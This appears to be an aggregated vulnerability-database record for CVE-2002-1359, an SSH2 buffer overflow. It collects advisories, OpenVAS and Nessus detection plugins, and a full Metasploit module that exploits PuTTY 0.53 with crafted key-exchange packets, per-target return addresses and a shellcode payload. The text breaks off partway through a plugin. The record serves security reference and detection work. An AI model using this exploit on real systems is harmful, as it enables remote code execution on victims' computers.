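CVE-2002-1359: Multiple SSH2 servers and clients do not properly handle large packets or large fields, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code via buffer overflow attacks, as demonstrated by the SSHredder SSH protocol test suite. According to Rapid7 advisory R7-0009, quoted in the records below, the flaws lie in the greeting and key-exchange-initialization phases of the SSHv2 transport layer, so no authentication is required to reach them, and the impact varies by product. The scanner entries below that match on the SSH banner infer exposure from the advertised version string only, so a finding should be confirmed against the vendor's list of fixed versions.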
{"checkpoint_advisories": [{"lastseen": "2021-12-17T12:12:40", "description": "A buffer overflow vulnerability has been reported in multiple SSH2 servers and clients. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-01-07T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SSH2 Products Response Buffer Overflow - Ver2 (CVE-2002-1359)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1359"], "modified": "2014-01-07T00:00:00", "id": "CPAI-2014-0066", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-04T19:41:50", "description": "A buffer overflow vulnerability has been reported in multiple SSH2 servers and clients. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SSH2 Products Response Buffer Overflow - Ver2 (CVE-2002-1359)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2002-1359"], "modified": "2022-07-04T00:00:00", "id": "CPAI-2014-0813", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:47", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "PuTTy.exe <= v0.53 Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2002-1359"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83008", "href": "https://packetstormsecurity.com/files/83008/PuTTy.exe-v0.53-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::TcpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PuTTy.exe <= v0.53 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the PuTTY SSH client that is triggered \nthrough a validation error in SSH.c. 
\n}, \n'Author' => 'MC', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2002-1359' ], \n[ 'OSVDB', '8044'], \n[ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ], \n[ 'BID', '6407'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\", \n'MaxNops' => 0, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ], \n[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], \n[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'December 16 2002', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new('SRVPORT', [ true, \"The SSH daemon port to listen on\", 22 ]) \n], self.class) \nend \n \ndef on_client_connect(client) \nreturn if ((p = regenerate_payload(client)) == nil) \n \nbuffer = \n\"SSH-2.0-OpenSSH_3.6.1p2\\r\\n\" + \n\"\\x00\\x00\\x4e\\xec\\x01\\x14\" + \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\xde\" + \n(((((rand_text_alphanumeric(64)) + \",\") * 30) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\") * 2) + \n(((rand_text_alphanumeric(64)) + \",\") * 2) + rand_text_alphanumeric(21) + \n[target.ret].pack('V') + make_nops(10) + p.encoded + \n(((rand_text_alphanumeric(64)) + \",\") * 15) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\" + \n(((rand_text_alphanumeric(64)) + \",\") * 30) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\" + \n(((rand_text_alphanumeric(64)) + \",\") * 21) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\" + \n(((((rand_text_alphanumeric(64)) + \",\") * 30) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\") * 6) + \n\"\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nprint_status(\"Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...\") \n \nclient.put(buffer) 
\nhandler \n \nservice.close_client(client) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83008/putty_msg_debug.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debiancve": [{"lastseen": "2022-07-04T06:01:21", "description": "Multiple SSH2 servers and clients do not properly handle large packets or large fields, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code via buffer overflow attacks, as demonstrated by the SSHredder SSH protocol test suite.", "cvss3": {}, "published": "2002-12-23T05:00:00", "type": "debiancve", "title": "CVE-2002-1359", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1359"], "modified": "2002-12-23T05:00:00", "id": "DEBIANCVE:CVE-2002-1359", "href": "https://security-tracker.debian.org/tracker/CVE-2002-1359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:10:05", "description": "According to its banner, the remote SSH server is vulnerable to one or \n more of the following vulnerabilities:\n\nCVE-2002-1357 (incorrect length)\nCVE-2002-1358 (lists with empty elements/empty strings)\nCVE-2002-1359 (large packets and large fields)\nCVE-2002-1360 (string fields with zeros)\n\nSome of these vulnerabilities may allow remote attackers to execute \narbitrary code with the privileges of the SSH process, usually root.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": 
"openvas", "title": "SSH Multiple Vulns", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2017-05-01T00:00:00", "id": "OPENVAS:11195", "href": "http://plugins.openvas.org/nasl.php?oid=11195", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ssh_multivulns_16122002.nasl 6053 2017-05-01 09:02:51Z teissa $\n# Description: SSH Multiple Vulns\n#\n# Authors:\n# Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>\n#\n# Copyright:\n# Copyright (C) 2002 Paul Johnston, Westpoint Ltd\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"According to its banner, the remote SSH server is vulnerable to one or \n more of the following vulnerabilities:\n\nCVE-2002-1357 (incorrect length)\nCVE-2002-1358 (lists with empty elements/empty strings)\nCVE-2002-1359 (large packets and large fields)\nCVE-2002-1360 (string fields with zeros)\n\nSome of these vulnerabilities may allow remote attackers to execute \narbitrary code with the privileges of the SSH process, usually root.\";\n\ntag_solution = \"Upgrade your SSH server to an unaffected version\";\n\nif(description)\n{\n script_id(11195);\n script_version(\"$Revision: 6053 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $\");\n script_tag(name:\"creation_date\", 
value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n\n name = \"SSH Multiple Vulns\";\n script_name(name);\n\n\n summary = \"SSH Multiple Vulnerabilities 16/12/2002\";\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\"); \n script_copyright(\"This script is Copyright (C) 2002 Paul Johnston, Westpoint Ltd\");\n script_family(\"Gain a shell remotely\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"ssh_detect.nasl\");\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\nport = get_kb_item(\"Services/ssh\");\nif (!port) port = 22;\n\nbanner = get_kb_item(\"SSH/banner/\" + port);\nif ( ! 
banner ) exit(0);\n\n\n#\n# SSH-2.0-3.2.0 F-Secure SSH Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) F-Secure SSH\", string:banner, icase:TRUE))\n{ \n security_message(port);\n}\n\n#\n# SSH-2.0-3.2.0 SSH Secure Shell Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) SSH Secure Shell\", string:banner, icase:TRUE))\n{ \n security_message(port);\n}\n\n#\n# SSH-1.99-Pragma SecureShell 3.0\n# versions up to 2.* affected\n#\nif(ereg(pattern:\"^SSH-1.99-Pragma SecureShell ([12]\\..*)\", string:banner, icase:TRUE))\n{ \n security_message(port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-30T16:38:07", "description": "According to its banner, the remote SSH server is vulnerable to one or\n more of the following vulnerabilities:\n\n CVE-2002-1357 (incorrect length)\n\n CVE-2002-1358 (lists with empty elements/empty strings)\n\n CVE-2002-1359 (large packets and large fields)\n\n CVE-2002-1360 (string fields with zeros)", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "SSH Multiple Vulns", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2020-03-26T00:00:00", "id": "OPENVAS:136141256231011195", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011195", "sourceData": "# OpenVAS Vulnerability Test\n# Description: SSH Multiple Vulns\n#\n# Authors:\n# Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>\n#\n# Copyright:\n# Copyright (C) 2002 Paul Johnston, Westpoint Ltd\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11195\");\n script_version(\"2020-03-26T13:48:10+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-26 13:48:10 +0000 (Thu, 26 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_name(\"SSH Multiple Vulns\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (C) 2002 Paul Johnston, Westpoint Ltd\");\n script_family(\"Gain a shell remotely\");\n script_dependencies(\"ssh_detect.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"ssh/server_banner/available\");\n\n script_tag(name:\"solution\", value:\"Upgrade your SSH server to an unaffected version.\");\n\n script_tag(name:\"summary\", value:\"According to its banner, the remote SSH server is vulnerable to one or\n more of the following vulnerabilities:\n\n CVE-2002-1357 (incorrect length)\n\n CVE-2002-1358 (lists with empty elements/empty strings)\n\n CVE-2002-1359 (large packets and large fields)\n\n CVE-2002-1360 (string fields with zeros)\");\n\n script_tag(name:\"impact\", value:\"Some of these vulnerabilities may allow remote attackers to execute\n arbitrary code with the privileges of the SSH process, usually root.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = ssh_get_port(default:22);\nbanner = ssh_get_serverbanner(port:port);\nif ( ! banner )\n exit(0);\n\n# SSH-2.0-3.2.0 F-Secure SSH Windows NT Server\n# versions up to 3.1.* affected\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) F-Secure SSH\", string:banner, icase:TRUE))\n{\n security_message(port:port);\n}\n\n# SSH-2.0-3.2.0 SSH Secure Shell Windows NT Server\n# versions up to 3.1.* affected\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) SSH Secure Shell\", string:banner, icase:TRUE))\n{\n security_message(port:port);\n}\n\n# SSH-1.99-Pragma SecureShell 3.0\n# versions up to 2.* affected\nif(ereg(pattern:\"^SSH-1.99-Pragma SecureShell ([12]\\..*)\", string:banner, icase:TRUE))\n{\n security_message(port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T13:19:16", "description": "The remote SSH server is vulnerable to various vulnerabilities that may allow an attacker to obtain a root shell on this host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "SSH Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2019-03-06T00:00:00", "cpe": [], "id": "1973.PRM", "href": "https://www.tenable.com/plugins/nnm/1973", "sourceData": "Binary data 1973.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:19:33", "description": "The remote SSH server (or client) is vulnerable to various vulnerabilities that may allow an attacker to obtain a root shell on this host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "SSH Multiple Vulnerabilities", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2019-03-06T00:00:00", "cpe": [], "id": "1974.PRM", "href": "https://www.tenable.com/plugins/nnm/1974", "sourceData": "Binary data 1974.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:20:36", "description": "It is possible to make the remote IOS crash when sending it malformed SSH packets during the key exchange.\n\nThese flaws are documented as CISCO bug ID CSCdz60229, CSCdy87221 and CSCdu75477.", "cvss3": {"score": null, "vector": null}, "published": "2003-03-14T00:00:00", "type": "nessus", "title": "Cisco SSH2 Server/Client Malformed Packet Remote DoS (CSCdz60229, CSCdy87221, CSCdu75477)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CSCDZ60229.NASL", "href": "https://www.tenable.com/plugins/nessus/11383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(11383);\n script_version(\"1.29\");\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_bugtraq_id(6397, 6405, 6407, 6408, 6410);\n\n script_name(english:\"Cisco SSH2 Server/Client Malformed Packet Remote DoS (CSCdz60229, CSCdy87221, CSCdu75477)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\" );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to make the remote IOS crash when sending\nit malformed SSH packets during the key exchange.\n\nThese flaws are documented as CISCO bug ID CSCdz60229, CSCdy87221 and \nCSCdu75477.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"See \nhttp://www.nessus.org/u?aed52b80\" );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PuTTY Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/03/14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/12/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value: \"cpe:/o:cisco:ios\");\n script_end_attributes();\n\n script_summary(english:\"Uses SNMP to determine if a flaw is present\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"snmp_sysDesc.nasl\", \"snmp_cisco_type.nasl\");\n script_require_keys(\"SNMP/community\", \"SNMP/sysDesc\", \"CISCO/model\");\n exit(0);\n}\n\n# The code starts here\n\nok=0;\nos = get_kb_item(\"SNMP/sysDesc\"); if(!os)exit(0);\nhardware = get_kb_item(\"CISCO/model\"); if(!hardware)exit(0);\n\n# Check for the required operating system...\n#----------------------------------------------------------------\n# Is this IOS ?\nif(!egrep(pattern:\".*(Internetwork Operating|IOS).*\", string:os))exit(0);\n# 12.0S\nif(egrep(string:os, pattern:\"((12\\.0\\(([0-9]|[1-1][0-9]|2[0-2])\\)|12\\.0)S[0-9]*|12\\.0\\(23\\)S[0-1]),\"))ok=1;\n\n# 12.0ST\nif(egrep(string:os, pattern:\"((12\\.0\\(([0-9]|[1-1][0-9]|2[0-0])\\)|12\\.0)ST[0-9]*|12\\.0\\(21\\)ST[0-5]),\"))ok=1;\n\n# 12.1E\nif(egrep(string:os, 
pattern:\"((12\\.1\\(([0-9]|1[0-3])\\)|12\\.1)E[0-9]*|12\\.1\\(14\\)E[0-0]),\"))ok=1;\n\n# 12.1EA\nif(egrep(string:os, pattern:\"(12\\.1\\(([0-9]|1[0-2])\\)|12\\.1)EA[0-9]*,\"))ok=1;\n\n# 12.1T\nif(egrep(string:os, pattern:\"(12\\.1\\([0-9]*\\)|12\\.1)T[0-9]*,\"))ok=1;\n\n# 12.2\nif(egrep(string:os, pattern:\"(12\\.2\\(([0-9]|1[0-2])\\)|12\\.2),\"))ok=1;\n\n# 12.2S\nif(egrep(string:os, pattern:\"(12\\.2\\(([0-9]|1[0-3])\\)|12\\.2)S[0-9]*,\"))ok=1;\n\n# 12.2T\nif(egrep(string:os, pattern:\"((12\\.2\\(([0-9]|1[0-2])\\)|12\\.2)T[0-9]*|12\\.2\\(13\\)T[0-0]),\"))ok=1;\n\n\n#----------------------------------------------\n\nif(ok)security_hole(port:161, proto:\"udp\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:19:28", "description": "The remote SSH server (or client) is vulnerable to various vulnerabilities that may allow an attacker to obtain a root shell on this host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "SSH Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2019-03-06T00:00:00", "cpe": [], "id": "1975.PRM", "href": "https://www.tenable.com/plugins/nnm/1975", "sourceData": "Binary data 1975.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T02:37:47", "description": "Certain Cisco products containing support for the Secure Shell (SSH) server are vulnerable to a Denial of Service (DoS) if the SSH server is enabled on the device. A malformed SSH packet directed at the affected device can cause a reload of the device. No authentication is necessary for the packet to be received by the affected device. 
The SSH server in Cisco IOS is disabled by default.\n\nCisco will be making free software available to correct the problem as soon as possible.\n\nThe malformed packets can be generated using the SSHredder test suite from Rapid7, Inc. Workarounds are available. The Cisco PSIRT is not aware of any malicious exploitation of this vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2010-09-01T00:00:00", "type": "nessus", "title": "SSH Malformed Packet Vulnerabilities - Cisco Systems", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20021219-SSH-PACKETHTTP.NASL", "href": "https://www.tenable.com/plugins/nessus/48968", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n# Security advisory is (C) CISCO, Inc.\n# See https://www.cisco.com/en/US/products/products_security_advisory09186a008011c3b4.shtml\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(48968);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/11/15\");\n\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_bugtraq_id(6405, 6407, 6408, 6410);\n script_xref(name:\"CERT-CC\", value:\"389665\");\n script_xref(name:\"CERT-CC\", value:\"CA-2002-36\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdu75477\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdy87221\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz07673\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz60229\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz62330\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz66748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeb16775\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCed38362\");\n script_xref(name:\"CISCO-SA\", 
value:\"cisco-sa-20021219-ssh-packet\");\n\n script_name(english:\"SSH Malformed Packet Vulnerabilities - Cisco Systems\");\n script_summary(english:\"Checks IOS version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Certain Cisco products containing support for the Secure Shell (SSH)\nserver are vulnerable to a Denial of Service (DoS) if the SSH server is\nenabled on the device. A malformed SSH packet directed at the affected\ndevice can cause a reload of the device. No authentication is necessary\nfor the packet to be received by the affected device. The SSH server in\nCisco IOS is disabled by default.\n\nCisco will be making free software available to correct the problem as\nsoon as possible.\n\nThe malformed packets can be generated using the SSHredder test suite\nfrom Rapid7, Inc. Workarounds are available. The Cisco PSIRT is not\naware of any malicious exploitation of this vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/security-center/advisories/R7-0009.jsp\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20021219-ssh-packet\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cc3e11cf\");\n # https://www.cisco.com/en/US/products/products_security_advisory09186a008011c3b4.shtml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4184156c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20021219-ssh-packet\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PuTTY Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n\n script_dependencie(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nflag = 0;\nreport_extra = \"\";\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS/Version\");\noverride = 0;\n\n# Affected: 12.0S\nif (check_release(version: version,\n patched: make_list(\"12.0(21)S6\", \"12.0(22)S4\", \"12.0(23)S2\"),\n oldest: \"12.0(5)S\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.0ST\nif (check_release(version: version,\n patched: make_list(\"12.0(20)ST7\", \"12.0(21)ST6\"),\n oldest: \"12.0(16)ST\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.1E\nif (check_release(version: version,\n patched: make_list(\"12.1(13)E3\", \"12.1(14)E1\"),\n oldest: \"12.1(5a)E\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.1EA\nif (check_release(version: version,\n patched: make_list(\"12.1(13)EA1\") )) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.1T\nif 
(deprecated_version(version, \"12.1T\")) {\n report_extra = '\\nNo fix is available for 12.1T releases. Upgrade to a supported version\\n'; flag++;\n}\n# Affected: 12.2\nif (check_release(version: version,\n patched: make_list(\"12.2(12b)\", \"12.2(13a)\"),\n oldest: \"12.2(1)\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.2S\nif (check_release(version: version,\n patched: make_list(\"12.2(14)S\"),\n oldest: \"12.2(1)S\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.2T\nif (check_release(version: version,\n patched: make_list(\"12.2(11)T3\", \"12.2(13)T1\") )) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n\nif (get_kb_item(\"Host/local_checks_enabled\"))\n{\n\n if (flag)\n {\n flag = 0;\n buf = cisco_command_kb_item(\"Host/Cisco/Config/show_ip_ssh\", \"show ip ssh\");\n if (check_cisco_result(buf))\n {\n if (preg(pattern:\"SSH\\s+Enabled\", multiline:TRUE, string:buf)) { flag = 1; }\n } else if 